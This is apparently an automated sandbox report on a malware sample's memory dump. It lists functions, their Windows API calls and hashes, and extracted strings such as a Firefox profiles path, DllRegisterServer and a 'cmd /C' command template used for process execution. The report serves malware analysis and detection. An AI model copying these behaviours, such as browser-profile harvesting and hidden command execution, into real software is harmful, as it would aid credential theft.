  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3F95, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80 Total matches: 37memorystring
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C59D7, Relevance: 7.6, APIs: 5, Instructions: 83 Total matches: 27memorytime
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
